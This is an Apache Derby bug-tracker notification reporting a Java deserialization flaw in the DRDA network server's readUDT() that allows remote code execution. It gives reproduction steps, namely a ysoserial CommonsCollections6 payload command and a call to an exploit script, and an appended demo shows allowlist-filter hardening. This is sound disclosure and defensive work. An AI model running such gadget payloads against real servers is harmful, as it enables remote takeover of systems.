[ https://issues.apache.org/jira/browse/DERBY-6993?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16416934#comment-16416934 ]

Ricter Zheng commented on DERBY-6993:
-------------------------------------

Hi, [~rhillegas]

JDK7 has gadgets to execute commands, so it doesn't depend on other libraries.
And we don't know whether there will be other gadgets inside Derby or the JDK, so if there are,
it will be easy to exploit.

> Derby Deserialization Vulnerability Leads to RCE
> ------------------------------------------------
>
>                 Key: DERBY-6993
>                 URL: https://issues.apache.org/jira/browse/DERBY-6993
>             Project: Derby
>          Issue Type: Bug
>    Affects Versions: 10.14.1.0
>         Environment: Windows 10
>            Reporter: Ricter Zheng
>            Priority: Major
>         Attachments: exp.py, image-2018-03-27-11-42-23-176.png
>
>
>  In `src\java\drda\org\apache\derby\impl\drda\DRDAConnThread.java`
>  
> {code:java}
> /** Read a UDT from the stream */
> private Object readUDT() throws DRDAProtocolException
> {
>     int length = reader.readNetworkShort(); // protocol control data always follows big endian
>     if (SanityManager.DEBUG) { trace("===== udt param length is: " + length); }
>     byte[] bytes = reader.readBytes(length);
>
>     try {
>         ByteArrayInputStream bais = new ByteArrayInputStream( bytes );
>         ObjectInputStream ois = new ObjectInputStream( bais );
>         // bytes come straight from the network peer and are deserialized without any class filtering
>         return ois.readObject();
>     }
>     catch (Exception e)
>     {
>         markCommunicationsFailure
>             ( e,"DRDAConnThread.readUDT()", "", e.getMessage(), "*" );
>         return null;
>     }
> }
> {code}
> `return ois.readObject();` causes a deserialization vulnerability.
>  
>  
> Launch Derby with a vulnerable Java library and the `-noSecurityManager` option
>  
> {code}
> "C:\Program Files\Java\jdk1.8.0_144\bin\java.exe" -classpath "C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derby.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbynet.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyclient.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbytools.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyoptionaltools.jar;..\lib\commons-collections.jar" org.apache.derby.drda.NetworkServerControl start -noSecurityManager
> {code}
>  
> Generate a Java deserialization payload using ysoserial:
>  
> {code}
> java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 calc > /path/to/exp.py/payload.data
> {code}
>  
> Then run the script in the attachment; it will execute `calc`.
> {code}
> python exp.py
> {code}
> !image-2018-03-27-11-42-23-176.png!
>  



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
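Added example, not Derby's code and not part of this issue: the same length-prefixed read-then-readObject() pattern as readUDT() beside a variant hardened with a JEP 290 ObjectInputFilter (JDK 9+), which rejects any class outside an explicit allowlist before any of that class's code runs. The allowlist contents and the class and method names are assumptions for the demo.

```java
import java.io.*;
import java.util.HashMap;

public class UdtFilterDemo {
    // Hypothetical allowlist: only the UDT classes a deployment expects, plus
    // depth/size caps; "!*" rejects every class not listed. The names here
    // are assumptions for the demo, not Derby's configuration.
    static final ObjectInputFilter UDT_FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=8;maxbytes=65536;java.lang.String;java.lang.Integer;java.lang.Number;!*");

    // Same shape as DRDAConnThread.readUDT(): peer-supplied bytes go straight to
    // readObject(), so any serializable class on the classpath can be instantiated.
    static Object readUdtUnfiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
        return ois.readObject();
    }

    // Hardened variant: the filter is consulted for every class, array, depth and
    // byte count before the class is resolved, so a disallowed class is rejected
    // before its constructor or readObject() ever executes.
    static Object readUdtFiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
        ois.setObjectInputFilter(UDT_FILTER);
        return ois.readObject();
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(baos)) {
            oos.writeObject(o);
        }
        return baos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample inputs: a benign value and a serializable class
        // that is not on the allowlist (standing in for any unexpected class).
        byte[] benign = serialize("hello");
        byte[] unexpected = serialize(new HashMap<String, String>());
        System.out.println("unfiltered accepts: " + readUdtUnfiltered(unexpected).getClass().getName());
        System.out.println("filtered accepts:   " + readUdtFiltered(benign));
        try {
            readUdtFiltered(unexpected);
        } catch (InvalidClassException e) {
            System.out.println("filtered rejects:   " + e.getMessage());
        }
    }
}
```

The filter can also be installed process-wide with `ObjectInputFilter.Config.setSerialFilter` (or `-Djdk.serialFilter=...`), which covers deserialization paths the application code does not control directly.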
